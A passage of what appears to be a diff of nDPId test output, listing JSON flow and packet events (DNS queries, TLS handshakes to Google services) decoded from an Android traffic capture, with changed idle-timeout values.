+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} 
00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} 
